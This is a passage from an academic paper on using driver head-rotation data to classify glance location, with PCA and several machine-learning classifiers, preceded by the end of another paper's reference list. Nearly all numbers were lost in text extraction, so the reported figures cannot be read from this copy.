maryland, june. association for computational linguistics. yoshua bengio, réjean ducharme, pascal vincent, and christian jauvin. . a neural probabilistic lan- guage model. journal of machine learning re- search, : – . elia bruni, gemma boleda, marco baroni, and nam khanh tran. . distributional semantics in technicolor. in proceedings of the th annual meeting of the association for computational lin- guistics (volume : long papers), pages – , jeju island, korea, july. association for computa- tional linguistics. john a bullinaria and joseph p levy. . extracting semantic representations from word co-occurrence statistics: a computational study. behavior research methods, ( ): – . john a bullinaria and joseph p levy. . extracting semantic representations from word co-occurrence statistics: stop-lists, stemming, and svd. behavior research methods, ( ): – . john caron. . experiments with lsa scor- ing: optimal rank and basis. in proceedings of the siam computational information retrieval work- shop, pages – . kenneth ward church and patrick hanks. . word association norms, mutual information, and lexicog- raphy. computational linguistics, ( ): – . ronan collobert and jason weston. . a unified architecture for natural language processing: deep neural networks with multitask learning. in pro- ceedings of the th international conference on machine learning, pages – . scott c. deerwester, susan t. dumais, thomas k. lan- dauer, george w. furnas, and richard a. harshman. . indexing by latent semantic analysis. jasis, ( ): – . c eckart and g young. . the approximation of one matrix by another of lower rank. psychome- trika, : – . roi reichart felix hill and anna korhonen. . simlex- : evaluating semantic models with (genuine) similarity estimation. arxiv preprint arxiv: . . adriano ferraresi, eros zanchetta, marco baroni, and silvia bernardini. . introducing and evaluating ukwac, a very large web-derived corpus of english. in proceedings of the th web as corpus workshop (wac- ), pages – . lev finkelstein, evgeniy gabrilovich, yossi matias, ehud rivlin, zach solan, gadi wolfman, and ey- tan ruppin. . placing search in context: the concept revisited. acm transactions on informa- tion systems, ( ): – . yoav goldberg and omer levy. . word vec explained: deriving mikolov et al.’s negative- sampling word-embedding method. arxiv preprint arxiv: . . zellig harris. . distributional structure. word, ( ): – . omer levy and yoav goldberg. a. dependency- based word embeddings. in proceedings of the nd annual meeting of the association for computa- tional linguistics (volume : short papers), pages – , baltimore, maryland. omer levy and yoav goldberg. b. linguistic regularities in sparse and explicit word representa- tions. in proceedings of the eighteenth confer- ence on computational natural language learning, pages – , baltimore, maryland. omer levy and yoav goldberg. c. neural word embeddings as implicit matrix factorization. in ad- vances in neural information processing systems : annual conference on neural information pro- cessing systems , december - , mon- treal, quebec, canada, pages – . minh-thang luong, richard socher, and christo- pher d. manning. . better word representa- tions with recursive neural networks for morphol- ogy. in proceedings of the seventeenth confer- ence on computational natural language learning, pages – , sofia, bulgaria, august. associa- tion for computational linguistics. oren melamud, ido dagan, jacob goldberger, idan szpektor, and deniz yuret. . probabilistic modeling of joint-context in distributional similar- ity. in proceedings of the eighteenth conference on computational natural language learning, pages – , baltimore, maryland, june. association for computational linguistics. tomas mikolov, kai chen, gregory s. corrado, and jeffrey dean. a. efficient estimation of word representations in vector space. in proceedings of the international conference on learning represen- tations (iclr). tomas mikolov, ilya sutskever, kai chen, gregory s. corrado, and jeffrey dean. b. distributed rep- resentations of words and phrases and their compo- sitionality. in advances in neural information pro- cessing systems, pages – . tomas mikolov, wen-tau yih, and geoffrey zweig. c. linguistic regularities in continuous space word representations. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies, pages – . sebastian padó and mirella lapata. . dependency-based construction of semantic space models. computational linguistics, ( ): – . patrick pantel and dekang lin. . discovering word senses from text. in proceedings of the eighth acm sigkdd international conference on knowl- edge discovery and data mining, pages – . acm. jeffrey pennington, richard socher, and christopher manning. . glove: global vectors for word representation. in proceedings of the con- ference on empirical methods in natural language processing (emnlp), pages – , doha, qatar, october. association for computational lin- guistics. kira radinsky, eugene agichtein, evgeniy gabrilovich, and shaul markovitch. . a word at a time: computing word relatedness using temporal semantic analysis. in proceedings of the th international conference on world wide web, pages – . acm. magnus sahlgren. . the word-space model. ph.d. thesis, stockholm university. peter d. turney and michael l. littman. . mea- suring praise and criticism: inference of semantic orientation from association. transactions on infor- mation systems, ( ): – . peter d. turney and patrick pantel. . from frequency to meaning: vector space models of se- mantics. journal of artificial intelligence research, ( ): – . peter d. turney. . domain and function: a dual- space model of semantic relations and compositions. journal of artificial intelligence research, : – . torsten zesch, christof müller, and iryna gurevych. . using wiktionary for computing semantic relatedness. in proceedings of the rd national conference on artificial intelligence - volume , aaai’ , pages – . aaai press. submitted august accepted january published february corresponding author joonbum lee, joonbum@mit.edu academic editor ana maguitman additional information and declarations can be found on page doi . /peerj-cs. copyright lee et al. distributed under creative commons cc-by . open access investigating the correspondence between driver head position and glance location joonbum lee , mauricio muñoz , , , lex fridman , trent victor , bryan reimer and bruce mehler agelab and new england university transportation center, massachusetts institute of technology, cambridge, ma, united states of america technical university of munich, munich, germany university of augsburg, augsburg, germany safer vehicle and traffic safety center, chalmers, göteborg, sweden abstract the relationship between a driver’s glance orientation and corresponding head rotation is highly complex due to its nonlinear dependence on the individual, task, and driving context. this paper presents expanded analytic detail and findings from an effort that explored the ability of head pose to serve as an estimator for driver gaze by connecting head rotation data with manually coded gaze region data using both a statistical analysis approach and a predictive (i.e., machine learning) approach. for the latter, classification accuracy increased as visual angles between two glance locations increased. in other words, the greater the shift in gaze, the higher the accuracy of classification. this is an intuitive but important concept that we make explicit through our analysis. the highest accuracy achieved was % using the method of hidden markov models (hmm) for the binary gaze classification problem of (a) glances to the forward roadway versus (b) glances to the center stack. results suggest that although there are individual differences in head-glance correspondence while driving, classifier models based on head-rotation data may be robust to these differences and therefore can serve as reasonable estimators for glance location. the results suggest that driver head pose can be used as a surrogate for eye gaze in several key conditions including the identification of high-eccentricity glances. inexpensive driver head pose tracking may be a key element in detection systems developed to mitigate driver distraction and inattention. subjects human-computer interaction, data mining and machine learning keywords head movements, glance classification, head-glance correspondence, driver distraction introduction eye movements have long been studied in the context of driver behavior, attention management, and task related visual demand assessment (e.g., wierwille, ). as driver distraction has become identified as one of the leading causes of vehicle crashes (national highway traffic safety administration, ; statistic brain, ), eye-tracking systems have been employed in numerous studies in the field of driving safety and driver visual attention allocation (e.g., wang et al., ). evaluating objective data on glance behavior, such as glance location (e.g., glance to the road, glance away from the road, etc.) and duration (e.g., mean of single glance duration, total glance time to a specific location, how to cite this article lee et al. ( ), investigating the correspondence between driver head position and glance location. peerj com- put. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:joonbum@mit.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. etc.) has been seen as key to understanding driver interaction with in-vehicle devices and to estimate potential crash risks. for example, several studies show that crash and near-crash risk increased as the duration of off-road glances increased (e.g., liang, lee & yekhshatyan, ; victor et al., ). however, traditional technologies for automated eye-tracking have been susceptible to data quality issues (ahlstrom et al., ; sodhi, reimer & llamazares, ) and difficult to reliably use in production systems, especially for on-road experiments and naturalistic driving studies. for these reasons, research on the correspondence between eye and head movement (which is relatively more robust to track in the presence of occlusion and movement artifact) have been conducted, and results suggest that head pose data may be useful as a surrogate for eye-glance data (e.g., talamonti et al., ; talamonti, kochhar & tijerina, ; tawari, chen & trivedi, ; vicente et al., ), although there may be issues as well. talamonti and colleagues ( ) found a low likelihood ( % or less) of head turns when glancing to the instrument panel and rearview mirror, and high likelihood ( % or more) when glancing to the left mirror, center console, and center stack. also, talamonti, kochhar & tijerina ( ) suggested that driver-specific thresholds need to be set in order to meaningfully use head yaw data as a glance predictor. these studies utilized a fixed-base driving simulator to collect data and applied a simple classifier to understand the relationship between head turns and glance locations. tawari, chen & trivedi ( ) and vicente et al. ( ) applied more advanced approaches, extracting facial features and landmarks to estimate gaze regions while driving a real car, but they did not focus on driver distraction aspects (e.g., completing secondary tasks while driving), which have critical safety implications. the present paper presents expanded analytic detail and findings from an effort that was developed to further explore whether head-rotation data can be used as a surrogate for eye-glance behaviors in an on-road environment where eye-tracking is more challenging compared to laboratory experiments (muñoz et al., ). this analysis took advantage of glance and head rotation data drawn from a study conducted by the virginia tech transportation institute (transportation research board, ); the glance data were manually coded for glance region and temporal points where glance orientation transition from one location to another by two independent coders (and a senior research associated mediated if disagreement occurred between two coders), and head rotation data were estimated from manually extracted facial landmarks (details are described in the ‘method’ section). this study utilized the data to: (a) begin developing a deeper understanding of how drivers’ rotate their heads, (b) generate input features for classifiers that predicted glance allocations, and (c) investigate individual differences in head-glance correspondence. based on the literature noted above, it was expected that head-rotation data could be used to predict some, but not all, glances away from the road. in the field of driver distraction evaluation, glances away from the road and glances to task-related areas such as displays are particularly important to measure (driver focus-telematics working group, ; national highway traffic safety administration, ). therefore, we tested whether head rotation can predict glances to the forward road, to the vehicle’s center stack (e.g., climate controls, infotainment display), and to other key locations in the vehicle (e.g., mirrors, see li & busso, ). subsequent efforts then evaluated the degree to which machine learning lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. algorithms could predict glances to closer and farther regions of the vehicle interface and to evaluate the degree to which individual differences influence behavior. the main objective of this study is to investigate the use of head pose data to predict glance location with on-road driving data. to achieve this, we analyze the data using principal component analysis (pca) and machine learning techniques by considering several factors that may affect model performance and interpretation. classification performance is a direct result of three principal factors: (a) the quantity and ‘‘shape’’ (e.g., uneven class membership, skewness, etc.) of the data, (b) the modeling methodology utilized, and (c) the descriptive potential (i.e., signal power) of the selected features. we consider results based on the original ‘‘skewed’’ dataset, which is characterized by a heavily uneven distribution of samples for each glance type ( % of all glances were forward glances), as well as a subset of the original dataset with an equal amount of glance samples for each type of glance. furthermore, in terms of model selection, there is a wide range of classifiers that could be selected from. as a secondary assessment of the viability of different classification approaches, four classifiers were examined to cover a wide range of data interpretation paradigms. these steps allow us to reasonably begin to isolate the descriptive potential of the head pose signal and a set of classification approaches that appear most promising for future endeavors targeting larger more sophisticated datasets or systems for real-time state assessment. subsequent sections describe details of the data and model development. methods as previously noted, this study is a secondary analysis of a subset of data collected by the virginia tech transportation institute (vtti) in support of the strategic highway research program (shrp ) naturalistic driving study (transportation research board, ). the data were provided to the mit agelab under an irb approved data sharing agreement. a number of the following details concerning the source dataset are drawn from a technical report (j sudweeks, a sarkar & a plummer, , unpublished data) prepared by vtti for the shrp program. participants were initially recruited to ensure that the dataset represented a wide array of facial geometry. participants who met the study’s eligibility criteria were assigned to participate in either static trials (e.g., data collected while not driving) or dynamic trials (e.g., data collected while driving). a total of participants were available ( participants for static trials and participants for dynamic trials). the sample spans four age groups ( – , – , – , and over , with a majority of cases falling in the first two groups) and consisted of males and females. data were collected in a saab - instrumented with a data acquisition system to collect a number of metrics, including digital video of the driver’s face. the video was recorded by a camera mounted below the rearview mirror. a previous brief report from our group (muñoz et al., ) showed a number of differences in the distributions of head rotations associated with glances to the road and center cluster between the static and dynamic samples. consequently, the data from the participants from the dynamic trials make up the focus of this analysis since actual on-road behavior is our primary interest. lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. test trials the dynamic trials were conducted on a predefined route around blacksburg, virginia. this route was approximately miles in length and consisted of various road types (e.g., two lane road, residential, rural, and divided highway). during the driving session, which usually lasted between to min, participants were instructed to perform five basic tasks, each of which was performed once: (a) report current vehicle speed, (b) indicate if any vehicles are immediately adjacent to the test vehicle, (c) turn the radio on and then off, (d) locate the cell phone in the center console, and (e) complete a brief simulated cell phone conversation. participants were accompanied by an in-vehicle experimenter who instructed participants to conduct each of the tasks at a safe time at roughly the same location on the route. data reduction video of each task/glance was recorded at frames per second and decomposed into frames for analysis. each video frame was annotated by two independent analysts who labeled seven predefined facial landmarks: (a) outer corner of the participant’s right eye, (b) inner corner of the participant’s right eye, (c) outer corner of the participant’s left eye, (d) inner corner of the participant’s left eye, (e) the tip of the participant’s nose, (f) the right corner of the participant’s mouth, and (g) the left corner of the participant’s mouth. two analysts’ x and y pixel coordinates for each landmark were averaged, and if the average frame pixel correction exceeded . pixels, the frame was considered as a significant disagreement between two analysts, and was excluded from the rotation estimate dataset. if either analyst could not make a reliable annotation, the landmark was marked as ‘‘missing,’’ and the frame was excluded from the rotation estimate dataset. for each video frame, geometric methods (e.g., murphy-chutorian & trivedi, ; gee & cipolla, ; horprasert, yacoob & davis, ), which utilize feature locations (e.g., eyes, mouth, and nose tip), configurations of the facial features, basic ratios between feature locations (e.g., ratio between binocular width and vertical distance from lit to midpoint between eyes), etc. were used for head rotation estimation. the head pose data consisted of three rotation estimates (i.e., x, y and z rotation). figure shows a rotation coordinate system. glance locations were coded by trained video analysts on a frame-by-frame basis into one of locations: forward, left forward, right forward, rearview mirror, left window/mirror, right window/mirror, over-the-shoulder, instrument cluster, center stack, cell phone, interior object, passenger, no eyes visible—glance location unknown, no eyes visible—eyes are off-road, eyes closed, and other (e.g., any glance that cannot be categorized using the above codes). figure shows of the glance locations. a senior analyst reviewed the output of the coding and provided feedback to the less-experienced analyst. glance allocations for each subject and task were merged with head rotation data using timestamps. model training and validation training data were derived from the dataset by taking all data belonging to a randomly sampled subset of the subjects ( %). the data from the remaining subjects ( %) were used to build a validation dataset. as one of the tested classifiers (the hidden markov model), lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure head rotation coordinate system. (a) rotation x: pitch, (b) rotation y : yaw, and (c) rota- tion z: roll. full-size doi: . /peerjcs. /fig- figure glance locations for the manual coding. full-size doi: . /peerjcs. /fig- takes the temporal structure of the input data into account, the timestamp ordering of the samples for each subject were maintained. all rotation variables were normalized by computing their individual z-scores per participant. the performance measures reported in the result section were computed using this normalization method. furthermore, to discount any potential bias inherent in how subjects are sampled, a monte-carlo sampling lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. technique was used (muñoz et al., ; muñoz et al., ). for each of iterations of this sampling approach, training and validation test sets were generated as above. all models were trained, and performance values were then computed for each classifier as the mean of each performance metric (standard accuracy, f score, and kappa value) over all iterations. one key issue considered is the unbalanced class structure (i.e., skewness) of the dataset, as glances to the forward roadway heavily outnumber glances to any other single location within the vehicle. for instance, out of all the glances to the forward roadway and center stack, approximately % belong to the former class (the forward roadway). random subsampling was used to prune away the over-represented glance locations in the data. data exploration the intrinsic discriminative quality of the data plays a crucial role in any classification framework (i.e., classification may be difficult in datasets in which classes overlap strongly in feature space). therefore, pca (jolliffe, ) was applied for representing the raw data in terms of its underlying structural patterns, computing the covariance matrix across all variables, and extracting the eigenvectors of this matrix. given this information, which characterizes how statistical variance is distributed amongst (linear) combinations of variables, this analysis can identify and visualize properties that might have an impact on classification performance, in particular which variables are most likely to contribute to a high classification accuracy. as explained in ‘principal component analysis’, in this context we use pca to reduce the dimensionality of the data from three dimensions (rotations in x,y ,z axes) to two dimensions and to examine which linear combinations of these rotations contribute most towards discriminating between glances to the center stack and forward roadway/right mirror. model development the classification methods presented in this paper are (a) k-nearest neighbor, (b) random forest, (c) multilayer perceptron, and (d) hidden markov models. implementations for all but the latter were taken from opencvc++ library v. . . , using default parameter settings unless otherwise noted. the hmm implementation was taken from matlab ( ). the parameters of each model were determined empirically with an experimental validation set (i.e., a random subset of the larger data pool). these methods were chosen based on the trade-off in running time, space complexity, and difficulty of parameter tuning. the k-nearest neighbor (knn) algorithm has the lowest number of parameters (k, the number of neighbors to consider, and the distance metric to evaluate between points) and arguably the highest space and running time complexity requirements during evaluation, but is very fast during training. the random forest classifier (breiman, ) is a representative ensemble method with high space complexity requirements both for training and evaluation, but unlike knn it is both fast to train and fast to evaluate. random forest uses a random subset of each input sample at different nodes to train sets of weak learners. this has the added benefit that as training progresses, variables with low information content are automatically filtered out, thus making the classifier especially lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. well-suited for data structured across heterogeneous input variables. the main parameters that require tuning are the number trees in the forest, the depth of the trees (usually kept constant across all trees), and the function used to split nodes of each tree. the multilayer perceptron (mlp) was taken as a representative of the larger class of artificial neural networks (ann) for their ability to model non-linear relationships between data points. mlp space complexity is low for both training and evaluation, while running time is slow for training and fast for evaluation. the basic parameters that require tuning here are the number of hidden layers and the number of neurons in each layer. hidden markov models (hmms) (rabiner & juang, ) are employed to test how much of the classification signal lies in the temporal structure of the data. sequences of head rotation and glance duration features are fed to the classifier, which then infers a single class label for the sequence of samples. glance duration features are computed from glance allocations as the timestamp difference between adjacent glances in time and inform the classifier about how long each glance is (see muñoz et al., for further details). as in the classical approach, one hmm is built from data from each class (glance location). the class label of an unobserved sequence is then determined by finding the hmm and its corresponding class that maximizes the log probability of the test sequence. practically speaking, the only elemental parameter of an hmm is the number of hidden states used to model the temporal data. muñoz et al. ( ) provides additional detail as to how the parameters for each model were set. model performance measures generally, a sample corresponds to a single -tuple of x,y , and z rotations. this is the case for all classifiers except the hmm, which understands a sample as a sequence (in time) of these tuples. for the purpose of this study, these tuples we grouped according to subject, task, and glance location, ordered according to increasing time, and labeled with the label of the glance location used in the grouping. classification then proceeded as in muñoz et al. ( ). to assess performances of the classifiers, the following three performance measures were used in a binary classification framework (center stack vs. forward roadway, and center stack vs. right mirror). the reason for introducing multiple measures at this stage is to get a fair estimate of classifier performance in light of heavily skewed classes in the dataset (i.e., glances to the forward roadway have a much higher presence in the data than any other class): . classification accuracy (ac) (e.g., sokolova & lapalme, ): the percentage of correctly classified samples (or sample sequences for the hmm classifier): classification accuracy= number of correctly labeled samples total number of samples . f -score (fs) (e.g., sokolova & lapalme, ): a measure of how well the classifier was able to distinguish between classes given an unbalanced dataset. f score= ×(positive predictive value×sensitivity) positive predictive value+sensitivity positive predictive value= number of true positives number of true positives+number of false positives lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. sensitivity= number of true positives number of true positives+number of false negatives . cohen’s kappa statistic (kp) (e.g., carletta, ): a measure indicating how well a classifier agrees with a perfect predictor (higher values indicate high agreement). cohen’s kappa= p (a)−p(e) −p(e) p(a) = relative observed agreement between model and perfect predictor (i.e., accuracy) p(e)= probablity of chance agreement between model and perfect predictor. results to answer the key questions outlined: (a) pca was applied to the driving data (see ‘test trials’ and ‘model performance measures’) as a method of quantifying the contributions of each head angle (x, y and z) in their ability to discriminate between glance locations (this study looks at forward vs. center stack, center stack vs. right mirror), (b) several predictive models (‘model development’) were tested (‘model performance measures’) for predicting glance location based on head position while driving and their accuracies compared, and (c) individual differences in head-glance correspondence during driving were addressed. principal component analysis the input to the pca stage are the filtered x, y and z rotation variables. no additional signal filtering was applied beyond the original butterworth filter used by the vtti in the creation of the dataset. pca was used to reinterpret the x, y and z filtered rotation variables along two independent (orthogonal) axes, i.e., the first two principal components. figure a interprets the dynamic -class data (center stack vs. forward) as pca scores. each point on the graph corresponds to a single sample from the original dataset, irrespective of participant or task (but limited to glances to the center stack and forward roadway). each axis of the graph corresponds to the noted principal component and illustrates the statistical behavior of the data along that component. although the input data were standardized per participant, the values plotted have been de-normalized to aid interpretation: they therefore have magnitudes in the range of actual rotations. figures a and a show the data along only the first two components of the pca decomposition. the distribution of individual data points and their class correspondence in fig. a was compared with the actual principal component values in fig. b to establish an informal overview of which variables are most likely to contribute to the classification effort. a rough clustering of forward glances may be observed in fig. a. this cluster center lies at moderate to high values of principal component (pc ). figure b reveals that pc increases in magnitude with increasing x and y rotation, both of which load highly on this component. in this instance, a linear combination of x and y rotation gives a rough but not clear cut decision boundary between glances to the center stack and glances to the forward roadway. pca lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. − − − pc p c glance location center stack forward (a) . − . − . . . . − . − . . x y z principal component r ot at io n . . value (b) figure principal component analysis (pca) of dynamic data, using head rotation. (a) glances to the center stack and forward roadway. (b) principal components of head rotation x, y and z for all data samples belonging to the center stack and forward roadway class. full-size doi: . /peerjcs. /fig- decomposition reveals that pc , which may be interpreted as a linear mix of x and y rotation, explains . % of the variance of the dataset, while pc explains only . % of the variance. lastly, pc (which due to the high loading factor of z rotation on this component may effectively be interpreted as the measure of the influence of z rotation) contributes only . % of the total variance. the same analysis was made for the center stack vs. right mirror case. figure provides a two-dimensional sample distribution plot as well as the corresponding principal components. figure a shows a nice separation of right mirror points, which are located towards on the bottom right quadrant of the scatter plot. figure b reveals that x and y rotation load highly on pc , i.e., pc increases with increasing x and y rotation, which makes sense intuitively. on the pc axis, the right mirror points are in negative pc space. looking at fig. b, we see that pc increases with increasing y rotation and decreases with decreasing x rotation. likewise, each component accounts for roughly the same amount of variance as in the center stack vs. forward roadway case above. we can therefore conclude that in order to distinguish glances to the forward roadway from glances the right mirror, it (a). suffices to look at x and y rotation, and (b). right mirror points are highly correlated with high y rotation (which loads heavily and positively on pc but negatively on pc ), but only for certain ranges of x rotation (which loads heavily and positively on both pc and pc ). lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. − − pc p c glance location right mirror forward (a) . . − . . − . . − . . . x y z principal component r ot at io n . . . . value (b) figure principal component analysis (pca) of dynamic data, using head rotation. (a) glances to the right mirror and forward roadway. (b) principal components of head rotation x,y , and z for all data samples belonging to the center stack and right mirror class. full-size doi: . /peerjcs. /fig- model validation table presents the performance measures for all four classifiers using the two representations of the data (balanced vs. unbalanced) for the forward vs. center stack case. as noted earlier, monte-carlo sampling ( iterations) was applied for deriving training and test sets. using the balanced dataset that removed glance distribution bias during training leads to a higher performance in terms of sensitivity/specificity (f scores all ≥ . ) and prediction quality (kappa all ≥ . ) of each classifier compared to (f scores all ≥ . ) and (kappa all ≥− . ) for the original unbalanced data. the hmm classifies sample sequences corresponding to blocks of data within a subject, task, and glance location group. across all classifier, the relatively strong model performances may indicate that the temporal structure of head rotation features can be potential information source. though all classifiers using the balanced dataset outperform a chance predictor, there is a clear upper bound on how much these features contribute to classification. in addition, other locations within the vehicle were also tested against glances to the forward roadway in order to examine the relationship between classification accuracy and the visual angle of the target. hmm and random forest models, which showed relatively higher accuracy among other classifiers, were selected and tested. table places the previous center stack classification efforts in this context and gives performance measures for the two classifiers with the overall best performance. as expected, a rough correlation between increasing visual angle and classification accuracy may be observed, reaching up lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table performance measures (ac, accuracy; fs, f score; kp, kappa statistic) across all classifiers and class distributions for dynamic data, forward roadway vs. center stack. original dataset balanced dataset ac fs kp ac fs kp k-nearest neighbor . . . . . . random forest . . . . . . multilayer perceptron . . . . . . hidden markov model . . . . . . table performance measures (ac, accuracy; fs, f score; kp, kappa statistic) across class distribu- tions for the random forest and hmm classifiers for dynamic data, forward roadway vs. instrument cluster, vs. left mirror, vs. center stack, vs. right mirror. forward vs. model original dataset balanced dataset ac fs kp ac fs kp instrument cluster random forest . . . . . . instrument cluster hidden markov model . . . . . . left mirror random forest . . . . . . left mirror hidden markov model . . . . . . center stack random forest . . . . . . center stack hidden markov model . . . . . . right mirror random forest . . . . . . right mirror hidden markov model . . . . . . to % classification rate with a balanced dataset. the results may support that head pose data can detect particularly detrimental glances (i.e., high-eccentricity glances) with high accuracy, whereas using head pose data alone does not provide high accuracy to detect low-eccentricity glances. individual differences in head-glance correspondence individual differences in head-glance correspondence were also tested. to minimize potential variability from characteristics of tasks, only the radio task (e.g., ‘‘turn the radio on and then off’’), which required glances to the center stack from the dynamic setting, was selected and analyzed. figure illustrates the distribution of participants’ individual y rotation while glancing to the center stack during the radio tasks (there was one subject who did not glance to the center stack and that case was excluded for the subsequent analysis). as can be observed in fig. , a wide range of y rotations exists while glancing to the center stack across the subject pool, with some subjects showing relatively narrow distributions and others showing wide distributions (note that individual dots in fig. visualize corresponding y rotation values while glancing to the center stack). it is also important to observe that the center point of each subject’s distribution varies even they are looking at the same object in space. to further explore the differences in rotation distributions in glances to the center stack in relation to glances to the forward roadway, y rotations were plotted over time while completing the radio task (see fig. ) for an illustrative sample of three subjects. this figure lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. − − − head rotation y s ub je ct id figure comparison of individual distribution of y rotation while glancing to the center stack dur- ing the radio task (note that one participant did not have any glances to the center stack, so this figure only shows participants’ data). full-size doi: . /peerjcs. /fig- visualizes how drivers horizontally rotate (e.g., y rotation) their head while engaging in the radio task and their glance locations over time (differentiated in colors). the top frame of fig. illustrates a profile that has relatively narrow range of y rotation while glancing to the center stack, and (relatively) limited overlap between the ranges of y rotation corresponding to glances to forward and glances to the center stack. the middle frame of fig. illustrates a profile that covers a wider range of y rotation with significant overlap of the two glance locations. finally, the lower frame illustrates a profile with a narrow range of y rotation with a sizable overlap between the glance locations. based on these exploratory findings, it was assumed that individual difference in head-glance correspondence may exist. figure shows subjects on two dimensions: (a) the mean difference of y rotation between glances to forward and to the center stack, and (b) the range of y rotation (i.e., distribution width of rotation y while glancing to the center stack). the result showed that the two dimensions were positively correlated, r( )= . , p < . , indicating that subjects who showed wider ranges of horizontal head rotations tended to have higher mean differences of rotation y while glancing to forward and the center stack. for example, subjects and showed relatively narrow ranges of horizontal head rotations (less than degrees) while glancing to the center and their mean rotation angles for glancing to the center stack were relatively close to their mean rotation angles for glancing to forward (the mean differences were . degrees for subject and . degrees for subject ). this may indicate that subjects on the left-bottom area in lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure illustration of three subjects’ y rotation ((a) subject , (b) subject , and (c) subject ) over time during dynamic radio tasks (note: line color represents glance locations). full-size doi: . /peerjcs. /fig- fig. such as subject and (i.e., narrow width and small mean difference) moved their head less actively to glance to the center stack, whereas subjects on the right-top are actively moved their head to glance to the center stack location. discussion this analysis investigated the relationship between head rotation and glance behavior during on-road driving. various machine learning techniques were employed to examine the predictive value of head rotation for glance location at an individual level. in this particular example, we used pca not specifically as a data reduction method (we only had three variables to begin with), but as a method to assess variable importance in the classification. we could clearly see how variances in x and y rotation spread heavily across lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. mean difference of rotation y between glances to forward and to the center stack d is tri bu tio n w id th o f r ot at io n y w hi le g la nc in g to th e ce nt er s ta ck figure drivers’ head angle profiles while glancing to the center stack during the radio tasks (note: numbers represent subject id). full-size doi: . /peerjcs. /fig- the first two components, i.e., in order to distinguish right mirror from forward glances it suffices to use a linear decision boundary on the first two components (this is evident from fig. ). that is, both vertical and horizontal head rotations are key variables to classify glance locations in this scenario, as expected. in a more general case, especially when the input data is highly dimensional, the outcome from pca can inform what features to move forward with in any subsequent classification or regression task. for this particular scenario, it provides a step-up from working with the raw rotation values in two ways: . pca provides an accurate d representation of this three dimensional problem, ironing out any inherent correlations between the x,y ,z rotation variables in the process. . by demonstrating to what extent each rotation variable loads on each axis of this representation, and knowing beforehand how the samples in this representation map to glance locations (classes) in our classification framework, it can be easily shown which rotations or combinations thereof are likely to be of most help for a classifier trained to discriminate between these classes. a total of four classifiers from a wide range of data interpretation techniques were used to detect patterns in head rotation data. both unbalanced raw data, which included more cases of glancing forward than glancing to the center stack, and balanced data were tested. substantial performance gains were observed when using the balanced training dataset. for the forward roadway vs. center stack case, hidden markov models performed the best with an accuracy of %. when comparing this number to the remaining accuracy values it should be remembered that different ratios are expressed—hmms work with sequences of point samples as inputs, while the remaining classifiers work with point lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. samples directly. all of the modeling approaches provided results that were well in excess of chance findings, suggesting that head rotation data is a fairly robust predictive signal. given that the limited number of glances to non-forward locations (i.e., glances to the center stack accounted for less than % of the total glances recorded) were captured during short/simple secondary tasks, model performance may be best considered as relative lower bound on the possible predictive quality for driver gaze detection. this study also looked at the variability in classification accuracy with increasing visual angles to show a significant correlation between the accuracy and visual angles. there may be multiple factors that influence drivers’ head-glance correspondence such as: (a) road environment (e.g., highway driving vs. rural driving), (b) secondary-task characteristics (e.g., tasks require long off-road glances from drivers vs. tasks require short off-road glances), (c) individual strategies for interacting with secondary tasks (e.g., fixing a head to forward while glancing to the center stack), and (d) physical constraints. for this reason, we analyzed only one type of the secondary tasks (i.e., the radio task) for testing individual differences (note that only this analysis subsampled data for one task and other analyses used the entire dataset including all tasks). the result showed that individual differences in head-glance correspondence may exist. it is well known that owls have to turn their entire head to change views as their eyes are fixed in their sockets, whereas some lizards (such as chameleons) have very large angles of eye movement. we also found lizard type drivers (e.g., subject and in fig. ) and owl type drivers (e.g., subject and in fig. ), and it was expected that head pose data could predict glance regions with higher accuracy for the owl type drivers who actively move heads while glancing away from the road. this result suggests the need for a user-specific model (e.g., training a classifier for each individual to detect glances away from the road by using head rotation) or additional input features (i.e., other facial features or pupil location) to increase model performance, especially for the lizard type drivers (who barely move their head while glancing away from the road). also, predictive power of head rotation data for specific types of glances, such as longer off-road glances which have been linked to greater risk of collision (victor et al., ), needs to be considered further. furthermore, efforts should assess the predictive power of head rotation data for certain types of glances such as those that are of longer duration, which have been linked to greater risk of collision (victor et al., ). one limitation of this work was that the analysis was only applied to the meidated and reduced data, given the fact that the present study conducted a secondary analysis of a subset of the original data. therefore, it should be acknowledged that these findings might not be extrapolated to other circumstances such as a situation where estimation of head orientation is extremely challenging. also, the present work focused on visual angle and classification accuracy between two objects, and individual differences in head and glance correspondence, regardless of task. however, as a previous study (land & tatler, ) revealed, drivers’ head movement and rotation pattern can be task-specific (e.g., racing). therefore, further studies which expend to task characteristics (both primary and secondary tasks), will need to be undertaken for a deeper understanding of drivers’ head and glance correspondence. lee et al. ( ), 